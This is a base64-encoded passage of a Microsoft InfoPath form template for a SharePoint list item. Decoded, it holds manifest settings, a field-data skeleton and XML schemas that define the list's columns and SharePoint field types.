vb2ZmaWNlL2luZm9wYXRoLzIwMDkvV1NTTGlzdC9xdWVyeUZpZWxkcyBzY2hlbWE0LnhzZCI+PC94c2Y6ZG9jdW1lbnRTY2hlbWE+DQoJPC94c2Y6ZG9jdW1lbnRTY2hlbWFzPg0KCTx4c2Y6ZmlsZU5ldz4NCgkJPHhzZjppbml0aWFsWG1sRG9jdW1lbnQgY2FwdGlvbj0iVGVtcGxhdGUiIGhyZWY9InRlbXBsYXRlLnhtbCI+PC94c2Y6aW5pdGlhbFhtbERvY3VtZW50Pg0KCTwveHNmOmZpbGVOZXc+DQoJPHhzZjpjYWxjdWxhdGlvbnM+PC94c2Y6Y2FsY3VsYXRpb25zPg0KCTx4c2Y6dmlld3MgZGVmYXVsdD0iRWRpdCBpdGVtIj4NCgkJPHhzZjp2aWV3IG5hbWU9IkVkaXQgaXRlbSIgY2FwdGlvbj0iRWRpdCBpdGVtIj4NCgkJCTx4c2Y6bWFpbnBhbmUgdHJhbnNmb3JtPSJ2aWV3MS54c2wiPjwveHNmOm1haW5wYW5lPg0KCQk8L3hzZjp2aWV3Pg0KCTwveHNmOnZpZXdzPg0KCTx4c2Y6c3VibWl0IG9uQWZ0ZXJTdWJtaXQ9ImNsb3NlIiBzaG93U3RhdHVzRGlhbG9nPSJubyI+DQoJCTx4c2Y6ZXJyb3JNZXNzYWdlPlRoZSBmb3JtIGNhbm5vdCBiZSBzdWJtaXR0ZWQgYmVjYXVzZSBvZiBhbiBlcnJvci48L3hzZjplcnJvck1lc3NhZ2U+DQoJCTx4c2Y6dXNlUXVlcnlBZGFwdGVyPjwveHNmOnVzZVF1ZXJ5QWRhcHRlcj4NCgk8L3hzZjpzdWJtaXQ+DQoJPHhzZjpxdWVyeT4NCgkJPHhzZjpzaGFyZXBvaW50TGlzdEFkYXB0ZXJSVyBxdWVyeUFsbG93ZWQ9InllcyIgc3VibWl0QWxsb3dlZD0ieWVzIiBzaXRlVVJMPSIuLi8uLi8uLi8iIHNoYXJlUG9pbnRMaXN0SUQ9IkxJU1RfSUQiIG5hbWU9Ik1haW4gRGF0YSBDb25uZWN0aW9uIiBjb250ZW50VHlwZUlEPSJDT05URU5UX1RZUEVfSUQiIHJlbGF0aXZlTGlzdFVybD0iLi4vIiB2ZXJzaW9uPSJiMzA2YzNjOWFmNDQ3MjciIHF1ZXJ5T25lSXRlbU9ubHk9InllcyI+DQoJCQk8eHNmOmZpZWxkIGludGVybmFsTmFtZT0iSUQiIHJlcXVpcmVkPSJubyIgdHlwZT0iQ291bnRlciI+PC94c2Y6ZmllbGQ+DQoJCQk8eHNmOmZpZWxkIGludGVybmFsTmFtZT0iVGl0bGUiIHJlcXVpcmVkPSJ5ZXMiIHR5cGU9IlRleHQiPjwveHNmOmZpZWxkPg0KCQkJPHhzZjpmaWVsZCBpbnRlcm5hbE5hbWU9IkF1dGhvciIgcmVxdWlyZWQ9Im5vIiB0eXBlPSJVc2VyIj48L3hzZjpmaWVsZD4NCgkJCTx4c2Y6ZmllbGQgaW50ZXJuYWxOYW1lPSJFZGl0b3IiIHJlcXVpcmVkPSJubyIgdHlwZT0iVXNlciI+PC94c2Y6ZmllbGQ+DQoJCQk8eHNmOmZpZWxkIGludGVybmFsTmFtZT0iTW9kaWZpZWQiIHJlcXVpcmVkPSJubyIgdHlwZT0iRGF0ZVRpbWUiPjwveHNmOmZpZWxkPg0KCQkJPHhzZjpmaWVsZCBpbnRlcm5hbE5hbWU9IkNyZWF0ZWQiIHJlcXVpcmVkPSJubyIgdHlwZT0iRGF0ZVRpbWUiPjwveHNmOmZpZWxkPg0KCQkJPHhzZjpmaWVsZCBpbnRlcm5hbE5hbWU9IkF0dGFjaG1lbnRzIiByZXF1aXJlZD0ibm8iIHR5cGU9IkF0dGFjaG1lbnRzIj48L3hzZjpmaWVsZD4NCgkJPC94c2Y6c2hhcmVwb2ludExpc3RBZGFwdGVyUlc+DQoJPC94c2Y6cXVlcnk+DQo8L3hzZjp4RG9jdW1lbnRDbGFzcz4NCjxkZnM6bXlGaWVsZHMgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIgeG1sbnM6ZGZzPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2RhdGFGb3JtU29sdXRpb24iIHhtbG5zOmQ9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDkvV1NTTGlzdC9kYXRhRmllbGRzIiB4bWxuczpwYz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwNy9QYXJ0bmVyQ29udHJvbHMiIHhtbG5zOm15PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvY21lRGF0YUZpZWxkcyIgeG1sbnM6bWE9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlLzIwMDkvbWV0YWRhdGEvcHJvcGVydGllcy9tZXRhQXR0cmlidXRlcyIgeG1sbnM6cT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwOS9XU1NMaXN0L3F1ZXJ5RmllbGRzIiB4bWxuczpkbXM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlLzIwMDkvZG9jdW1lbnRNYW5hZ2VtZW50L3R5cGVzIiB4bWxuczp4ZD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMyI+DQoJPGRmczpxdWVyeUZpZWxkcz4NCgkJPHE6U2hhcmVQb2ludExpc3RJdGVtX1JXPg0KCQkJPHE6SUQvPg0KCQkJPHE6VGl0bGUvPg0KCQkJPHE6QXV0aG9yLz4NCgkJCTxxOkVkaXRvci8+DQoJCQk8cTpNb2RpZmllZC8+DQoJCQk8cTpDcmVhdGVkLz4NCgkJPC9xOlNoYXJlUG9pbnRMaXN0SXRlbV9SVz4NCgk8L2RmczpxdWVyeUZpZWxkcz4NCgk8ZGZzOmRhdGFGaWVsZHM+DQoJCTxteTpTaGFyZVBvaW50TGlzdEl0ZW1fUlc+DQoJCQk8bXk6SUQvPg0KCQkJPG15OlRpdGxlLz4NCgkJCTxteTpBdXRob3I+DQoJCQkJPHBjOlBlcnNvbj4NCgkJCQkJPHBjOkRpc3BsYXlOYW1lLz4NCgkJCQkJPHBjOkFjY291bnRJZC8+DQoJCQkJCTxwYzpBY2NvdW50VHlwZS8+DQoJCQkJPC9wYzpQZXJzb24+DQoJCQk8L215OkF1dGhvcj4NCgkJCTxteTpFZGl0b3I+DQoJCQkJPHBjOlBlcnNvbj4NCgkJCQkJPHBjOkRpc3BsYXlOYW1lLz4NCgkJCQkJPHBjOkFjY291bnRJZC8+DQoJCQkJCTxwYzpBY2NvdW50VHlwZS8+DQoJCQkJPC9wYzpQZXJzb24+DQoJCQk8L215OkVkaXRvcj4NCgkJCTxteTpNb2RpZmllZC8+DQoJCQk8bXk6Q3JlYXRlZC8+DQoJCQk8bXk6QXR0YWNobWVudHM+DQoJCQkJPGF0dGFjaG1lbnRVUkwvPg0KCQkJPC9teTpBdHRhY2htZW50cz4NCgkJPC9teTpTaGFyZVBvaW50TGlzdEl0ZW1fUlc+DQoJPC9kZnM6ZGF0YUZpZWxkcz4NCgk8eGQ6U2NoZW1hSW5mbyBMb2NhbE5hbWU9Im15RmllbGRzIiBOYW1lc3BhY2VVUkk9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMvZGF0YUZvcm1Tb2x1dGlvbiI+DQoJCTx4ZDpOYW1lc3BhY2VzPg0KCQkJPHhkOk5hbWVzcGFjZSBMb2NhbE5hbWU9Im15RmllbGRzIiBOYW1lc3BhY2VVUkk9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMvZGF0YUZvcm1Tb2x1dGlvbiIvPg0KCQk8L3hkOk5hbWVzcGFjZXM+DQoJCTx4ZDpSZXF1aXJlZEFueXMvPg0KCTwveGQ6U2NoZW1hSW5mbz4NCjwvZGZzOm15RmllbGRzPjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04IiBzdGFuZGFsb25lPSJubyI/Pg0KPHhzZDpzY2hlbWEgdGFyZ2V0TmFtZXNwYWNlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2RhdGFGb3JtU29sdXRpb24iIGVsZW1lbnRGb3JtRGVmYXVsdD0icXVhbGlmaWVkIiBhdHRyaWJ1dGVGb3JtRGVmYXVsdD0idW5xdWFsaWZpZWQiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zOmRtcz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvMjAwOS9kb2N1bWVudE1hbmFnZW1lbnQvdHlwZXMiIHhtbG5zOmRmcz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy9kYXRhRm9ybVNvbHV0aW9uIiB4bWxuczpxPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvcXVlcnlGaWVsZHMiIHhtbG5zOmQ9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDkvV1NTTGlzdC9kYXRhRmllbGRzIiB4bWxuczptYT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvMjAwOS9tZXRhZGF0YS9wcm9wZXJ0aWVzL21ldGFBdHRyaWJ1dGVzIiB4bWxuczpwYz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwNy9QYXJ0bmVyQ29udHJvbHMiIHhtbG5zOm15PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvY21lRGF0YUZpZWxkcyI+DQoJPHhzZDppbXBvcnQgbmFtZXNwYWNlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvY21lRGF0YUZpZWxkcyIgc2NoZW1hTG9jYXRpb249InNjaGVtYTEueHNkIi8+DQoJPHhzZDppbXBvcnQgbmFtZXNwYWNlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvcXVlcnlGaWVsZHMiIHNjaGVtYUxvY2F0aW9uPSJzY2hlbWE0LnhzZCIvPg0KCTx4c2Q6ZWxlbWVudCBuYW1lPSJteUZpZWxkcyI+DQoJCTx4c2Q6Y29tcGxleFR5cGU+DQoJCQk8eHNkOnNlcXVlbmNlPg0KCQkJCTx4c2Q6ZWxlbWVudCBuYW1lPSJxdWVyeUZpZWxkcyI+DQoJCQkJCTx4c2Q6Y29tcGxleFR5cGU+DQoJCQkJCQk8eHNkOnNlcXVlbmNlPg0KCQkJCQkJCTx4c2Q6ZWxlbWVudCByZWY9InE6U2hhcmVQb2ludExpc3RJdGVtX1JXIiBtaW5PY2N1cnM9IjAiIG1heE9jY3Vycz0iMSIvPg0KCQkJCQkJPC94c2Q6c2VxdWVuY2U+DQoJCQkJCTwveHNkOmNvbXBsZXhUeXBlPg0KCQkJCTwveHNkOmVsZW1lbnQ+DQoJCQkJPHhzZDplbGVtZW50IG5hbWU9ImRhdGFGaWVsZHMiPg0KCQkJCQk8eHNkOmNvbXBsZXhUeXBlPg0KCQkJCQkJPHhzZDpzZXF1ZW5jZT4NCgkJCQkJCQk8eHNkOmVsZW1lbnQgcmVmPSJteTpTaGFyZVBvaW50TGlzdEl0ZW1fUlciIG1pbk9jY3Vycz0iMCIgbWF4T2NjdXJzPSIxIi8+DQoJCQkJCQk8L3hzZDpzZXF1ZW5jZT4NCgkJCQkJPC94c2Q6Y29tcGxleFR5cGU+DQoJCQkJPC94c2Q6ZWxlbWVudD4NCgkJCQk8eHNkOmFueSBuYW1lc3BhY2U9IiMjb3RoZXIiIHByb2Nlc3NDb250ZW50cz0ibGF4IiBtaW5PY2N1cnM9IjAiIG1heE9jY3Vycz0idW5ib3VuZGVkIi8+DQoJCQk8L3hzZDpzZXF1ZW5jZT4NCgkJCTx4c2Q6YW55QXR0cmlidXRlIG5hbWVzcGFjZT0iIyNvdGhlciIgcHJvY2Vzc0NvbnRlbnRzPSJsYXgiLz4NCgkJPC94c2Q6Y29tcGxleFR5cGU+DQoJPC94c2Q6ZWxlbWVudD4NCjwveHNkOnNjaGVtYT48P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCIgc3RhbmRhbG9uZT0ibm8iPz4NCjx4c2Q6c2NoZW1hIHRhcmdldE5hbWVzcGFjZT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwOS9XU1NMaXN0L2NtZURhdGFGaWVsZHMiIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOmRmcz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy9kYXRhRm9ybVNvbHV0aW9uIiB4bWxuczpkPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvZGF0YUZpZWxkcyIgeG1sbnM6cGM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDcvUGFydG5lckNvbnRyb2xzIiB4bWxuczpteT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwOS9XU1NMaXN0L2NtZURhdGFGaWVsZHMiIHhtbG5zOm1hPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS8yMDA5L21ldGFkYXRhL3Byb3BlcnRpZXMvbWV0YUF0dHJpYnV0ZXMiIHhtbG5zOnE9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDkvV1NTTGlzdC9xdWVyeUZpZWxkcyIgeG1sbnM6ZG1zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS8yMDA5L2RvY3VtZW50TWFuYWdlbWVudC90eXBlcyIgeG1sbnM6eGQ9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiPg0KCTx4c2Q6aW1wb3J0IHNjaGVtYUxvY2F0aW9uPSJzY2hlbWEueHNkIiBuYW1lc3BhY2U9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMvZGF0YUZvcm1Tb2x1dGlvbiIvPg0KCTx4c2Q6aW1wb3J0IHNjaGVtYUxvY2F0aW9uPSJzY2hlbWEyLnhzZCIgbmFtZXNwYWNlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS8yMDA5L2RvY3VtZW50TWFuYWdlbWVudC90eXBlcyIvPg0KCTx4c2Q6aW1wb3J0IHNjaGVtYUxvY2F0aW9uPSJzY2hlbWEzLnhzZCIgbmFtZXNwYWNlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA3L1BhcnRuZXJDb250cm9scyIvPg0KCTx4c2Q6aW1wb3J0IHNjaGVtYUxvY2F0aW9uPSJzY2hlbWE0LnhzZCIgbmFtZXNwYWNlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvcXVlcnlGaWVsZHMiLz4NCgk8eHNkOmVsZW1lbnQgbmFtZT0iU2hhcmVQb2ludExpc3RJdGVtX1JXIj4NCgkJPHhzZDpjb21wbGV4VHlwZT4NCgkJCTx4c2Q6c2VxdWVuY2U+DQoJCQkJPHhzZDplbGVtZW50IHJlZj0ibXk6SUQiIG1pbk9jY3Vycz0iMCIvPg0KCQkJCTx4c2Q6ZWxlbWVudCByZWY9Im15OlRpdGxlIiBtaW5PY2N1cnM9IjAiLz4NCgkJCQk8eHNkOmVsZW1lbnQgcmVmPSJteTpBdXRob3IiIG1pbk9jY3Vycz0iMCIvPg0KCQkJCTx4c2Q6ZWxlbWVudCByZWY9Im15OkVkaXRvciIgbWluT2NjdXJzPSIwIi8+DQoJCQkJPHhzZDplbGVtZW50IHJlZj0ibXk6TW9kaWZpZWQiIG1pbk9jY3Vycz0iMCIvPg0KCQkJCTx4c2Q6ZWxlbWVudCByZWY9Im15OkNyZWF0ZWQiIG1pbk9jY3Vycz0iMCIvPg0KCQkJCTx4c2Q6ZWxlbWVudCByZWY9Im15OkF0dGFjaG1lbnRzIiBtaW5PY2N1cnM9IjAiLz4NCgkJCTwveHNkOnNlcXVlbmNlPg0KCQk8L3hzZDpjb21wbGV4VHlwZT4NCgk8L3hzZDplbGVtZW50Pg0KCTx4c2Q6ZWxlbWVudCBuYW1lPSJJRCIgbWE6ZGlzcGxheU5hbWU9IklEIiBtYTpyZWFkT25seT0iVHJ1ZSIgbWE6YWxsb3dEZWxldGlvbj0iZmFsc2UiIG5pbGxhYmxlPSJ0cnVlIiB0eXBlPSJkbXM6Q291bnRlclR5cGUiLz4NCgk8eHNkOmVsZW1lbnQgbmFtZT0iVGl0bGUiIG1hOmRpc3BsYXlOYW1lPSJUaXRsZSIgbWE6YWxsb3dEZWxldGlvbj0iZmFsc2UiPg0KCQk8eHNkOnNpbXBsZVR5cGU+DQoJCQk8eHNkOnJlc3RyaWN0aW9uIGJhc2U9ImRtczpUZXh0VHlwZSI+DQoJCQkJPHhzZDptaW5MZW5ndGggdmFsdWU9IjEiLz4NCgkJCQk8eHNkOm1heExlbmd0aCB2YWx1ZT0iMjU1Ii8+DQoJCQk8L3hzZDpyZXN0cmljdGlvbj4NCgkJPC94c2Q6c2ltcGxlVHlwZT4NCgk8L3hzZDplbGVtZW50Pg0KCTx4c2Q6ZWxlbWVudCBuYW1lPSJBdXRob3IiIG1hOmRpc3BsYXlOYW1lPSJDcmVhdGVkIEJ5IiBtYTpyZWFkT25seT0iVHJ1ZSIgbWE6U2hhcmVQb2ludEdyb3VwPSIwIiBtYTpTZWFyY2hQZW9wbGVPbmx5PSJ0cnVlIiBtYTphbGxvd0RlbGV0aW9uPSJmYWxzZSIgdHlwZT0iZG1zOlVzZXJUeXBlIi8+DQoJPHhzZDplbGVtZW50IG5hbWU9IkVkaXRvciIgbWE6ZGlzcGxheU5hbWU9Ik1vZGlmaWVkIEJ5IiBtYTpyZWFkT25seT0iVHJ1ZSIgbWE6U2hhcmVQb2ludEdyb3VwPSIwIiBtYTpTZWFyY2hQZW9wbGVPbmx5PSJ0cnVlIiBtYTphbGxvd0RlbGV0aW9uPSJmYWxzZSIgdHlwZT0iZG1zOlVzZXJUeXBlIi8+DQoJPHhzZDplbGVtZW50IG5hbWU9Ik1vZGlmaWVkIiBtYTpkaXNwbGF5TmFtZT0iTW9kaWZpZWQiIG1hOnJlYWRPbmx5PSJUcnVlIiBtYTpmb3JtYXRTcGVjPSJkYXRlRm9ybWF0OlNob3J0IERhdGU7dGltZUZvcm1hdDpub25lOyIgbWE6Zm9ybWF0Q2F0ZWdvcnk9ImRhdGV0aW1lIiBtYTphbGxvd0RlbGV0aW9uPSJmYWxzZSIgbmlsbGFibGU9InRydWUiIHR5cGU9ImRtczpEYXRlVGltZVR5cGUiLz4NCgk8eHNkOmVsZW1lbnQgbmFtZT0iQ3JlYXRlZCIgbWE6ZGlzcGxheU5hbWU9IkNyZWF0ZWQiIG1hOnJlYWRPbmx5PSJUcnVlIiBtYTpmb3JtYXRTcGVjPSJkYXRlRm9ybWF0OlNob3J0IERhdGU7dGltZUZvcm1hdDpub25lOyIgbWE6Zm9ybWF0Q2F0ZWdvcnk9ImRhdGV0aW1lIiBtYTphbGxvd0RlbGV0aW9uPSJmYWxzZSIgbmlsbGFibGU9InRydWUiIHR5cGU9ImRtczpEYXRlVGltZVR5cGUiLz4NCgk8eHNkOmVsZW1lbnQgbmFtZT0iQXR0YWNobWVudHMiIG1hOmRpc3BsYXlOYW1lPSJBdHRhY2htZW50cyIgbWE6YWxsb3dEZWxldGlvbj0iZmFsc2UiIHR5cGU9ImRtczpBdHRhY2htZW50c1R5cGUiLz4NCjwveHNkOnNjaGVtYT48P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCIgc3RhbmRhbG9uZT0ibm8iPz4NCjx4c2Q6c2NoZW1hIHRhcmdldE5hbWVzcGFjZT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvMjAwOS9kb2N1bWVudE1hbmFnZW1lbnQvdHlwZXMiIHhtbG5zOmRtcz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvMjAwOS9kb2N1bWVudE1hbmFnZW1lbnQvdHlwZXMiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zOnBjPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA3L1BhcnRuZXJDb250cm9scyIgeG1sbnM6bWE9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlLzIwMDkvbWV0YWRhdGEvcHJvcGVydGllcy9tZXRhQXR0cmlidXRlcyI+DQoJPHhzZDppbXBvcnQgbmFtZXNwYWNlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA3L1BhcnRuZXJDb250cm9scyIgc2NoZW1hTG9jYXRpb249InNjaGVtYTMueHNkIi8+DQoJPHhzZDpzaW1wbGVUeXBlIG5hbWU9IkNvdW50ZXJUeXBlIj4NCgkJPHhzZDpyZXN0cmljdGlvbiBiYXNlPSJ4c2Q6cG9zaXRpdmVJbnRlZ2VyIi8+DQoJPC94c2Q6c2ltcGxlVHlwZT4NCgk8eHNkOnNpbXBsZVR5cGUgbmFtZT0iSW50ZWdlclR5cGUiPg0KCQk8eHNkOnJlc3RyaWN0aW9uIGJhc2U9InhzZDppbnRlZ2VyIi8+DQoJPC94c2Q6c2ltcGxlVHlwZT4NCgk8eHNkOnNpbXBsZVR5cGUgbmFtZT0iTnVtYmVyVHlwZSI+DQoJCTx4c2Q6cmVzdHJpY3Rpb24gYmFzZT0ieHNkOmRvdWJsZSIvPg0KCTwveHNkOnNpbXBsZVR5cGU+DQoJPHhzZDpzaW1wbGVUeXBlIG5hbWU9IkNhbGN1bGF0ZWRUeXBlIj4NCgkJPHhzZDpyZXN0cmljdGlvbiBiYXNlPSJ4c2Q6c3RyaW5nIi8+DQoJPC94c2Q6c2ltcGxlVHlwZT4NCgk8eHNkOnNpbXBsZVR5cGUgbmFtZT0iRGF0ZVRpbWVUeXBlIj4NCgkJPHhzZDpyZXN0cmljdGlvbiBiYXNlPSJ4c2Q6ZGF0ZVRpbWUiLz4NCgk8L3hzZDpzaW1wbGVUeXBlPg0KCTx4c2Q6c2ltcGxlVHlwZSBuYW1lPSJEYXRlT25seVR5cGUiPg0KCQk8eHNkOnJlc3RyaWN0aW9uIGJhc2U9InhzZDpkYXRlVGltZSIvPg0KCTwveHNkOnNpbXBsZVR5cGU+DQoJPHhzZDpzaW1wbGVUeXBlIG5hbWU9IkN1cnJlbmN5VHlwZSI+DQoJCTx4c2Q6cmVzdHJpY3Rpb24gYmFzZT0ieHNkOmRlY2ltYWwiLz4NCgk8L3hzZDpzaW1wbGVUeXBlPg0KCTx4c2Q6c2ltcGxlVHlwZSBuYW1lPSJUZXh0VHlwZSI+DQoJCTx4c2Q6cmVzdHJpY3Rpb24gYmFzZT0ieHNkOnN0cmluZyIvPg0KCTwveHNkOnNpbXBsZVR5cGU+DQoJPHhzZDpzaW1wbGVUeXBlIG5hbWU9IkJvb2xlYW5UeXBlIj4NCgkJPHhzZDpyZXN0cmljdGlvbiBiYXNlPSJ4c2Q6Ym9vbGVhbiIvPg0KCTwveHNkOnNpbXBsZVR5cGU+DQoJPHhzZDpzaW1wbGVUeXBlIG5hbWU9Ikxvb2t1cFR5cGUiPg0KCQk8eHNkOnJlc3RyaWN0aW9uIGJhc2U9InhzZDpwb3NpdGl2ZUludGVnZXIiLz4NCgk8L3hzZDpzaW1wbGVUeXBlPg0KCTx4c2Q6c2ltcGxlVHlwZSBuYW1lPSJDaG9pY2VUeXBlIj4NCgkJPHhzZDpyZXN0cmljdGlvbiBiYXNlPSJ4c2Q6c3RyaW5nIi8+DQoJPC94c2Q6c2ltcGxlVHlwZT4NCgk8eHNkOmNvbXBsZXhUeXBlIG5hbWU9Ik11bHRpQ2hvaWNlVHlwZSI+DQoJCTx4c2Q6c2VxdWVuY2U+DQoJCQk8eHNkOmVsZW1lbnQgbmFtZT0iVmFsdWUiIHR5cGU9ImRtczpDaG9pY2VUeXBlIiBtaW5PY2N1cnM9IjAiIG1heE9jY3Vycz0idW5ib3VuZGVkIi8+DQoJCTwveHNkOnNlcXVlbmNlPg0KCTwveHNkOmNvbXBsZXhUeXBlPg0KCTx4c2Q6c2ltcGxlVHlwZSBuYW1lPSJDaG9pY2VGaWxsSW5UeXBlIj4NCgkJPHhzZDpyZXN0cmljdGlvbiBiYXNlPSJ4c2Q6c3RyaW5nIi8+DQoJPC94c2Q6c2ltcGxlVHlwZT4NCgk8eHNkOmNvbXBsZXhUeXBlIG5hbWU9Ikxvb2t1cE11bHRpVHlwZSI+DQoJCTx4c2Q6c2VxdWVuY2U+DQoJCQk8eHNkOmVsZW1lbnQgbmFtZT0iVmFsdWUiIHR5cGU9ImRtczpMb29rdXBUeXBlIiBuaWxsYWJsZT0idHJ1ZSIgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCIvPg0KCQk8L3hzZDpzZXF1ZW5jZT4NCgk8L3hzZDpjb21wbGV4VHlwZT4NCgk8eHNkOmNvbXBsZXhUeXBlIG5hbWU9Ik11bHRpQ2hvaWNlRmlsbEluVHlwZSI+DQoJCTx4c2Q6c2VxdWVuY2U+DQoJCQk8eHNkOmVsZW1lbnQgbmFtZT0iVmFsdWUiIHR5cGU9ImRtczpDaG9pY2VUeXBlIiBtaW5PY2N1cnM9IjAiIG1heE9jY3Vycz0idW5ib3VuZGVkIi8+DQoJCTwveHNkOnNlcXVlbmNlPg0KCTwveHNkOmNvbXBsZXhUeXBlPg0KCTx4c2Q6Y29tcGxleFR5cGUgbmFtZT0iTXVsdGlDaG9pY2VGaWxsSW5SZXF1aXJlZFR5cGUiPg0KCQk8eHNkOnNlcXVlbmNlPg0KCQkJPHhzZDplbGVtZW50IG5hbWU9IlZhbHVlIiBtaW5PY2N1cnM9IjAiIG1heE9jY3Vycz0idW5ib3VuZGVkIj4NCgkJCQk8eHNkOnNpbXBsZVR5cGU+DQoJCQkJCTx4c2Q6cmVzdHJpY3Rpb24gYmFzZT0iZG1zOkNob2ljZVR5cGUiPg0KCQkJCQkJPHhzZDptaW5MZW5ndGggdmFsdWU9IjEiLz4NCgkJCQkJPC94c2Q6cmVzdHJpY3Rpb24+DQoJCQkJPC94c2Q6c2ltcGxlVHlwZT4NCgkJCTwveHNkOmVsZW1lbnQ+DQoJCTwveHNkOnNlcXVlbmNlPg0KCTwveHNkOmNvbXBsZXhUeXBlPg0KCTx4c2Q6c2ltcGxlVHlwZSBuYW1lPSJOb3RlUGxhaW5UeXBlIj4NCgkJPHhzZDpyZXN0cmljdGlvbiBiYXNlPSJ4c2Q6c3RyaW5nIi8+DQoJPC94c2Q6c2ltcGxlVHlwZT4NCgk8eHNkOmNvbXBsZXhUeXBlIG5hbWU9Ik5vdGVSaWNoVHlwZSIgbWl4ZWQ9InRydWUiPg0KCQk8eHNkOnNlcXVlbmNlPg0KCQkJPHhzZDphbnkgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCIgbmFtZXNwYWNlPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBwcm9jZXNzQ29udGVudHM9ImxheCIvPg0KCQk8L3hzZDpzZXF1ZW5jZT4NCgk8L3hzZDpjb21wbGV4VHlwZT4NCgk8eHNkOmNvbXBsZXhUeXBlIG5hbWU9Ik5vdGVFbmhhbmNlZFR5cGUiIG1peGVkPSJ0cnVlIj4NCgkJPHhzZDpzZXF1ZW5jZT4NCgkJCTx4c2Q6YW55IG1pbk9jY3Vycz0iMCIgb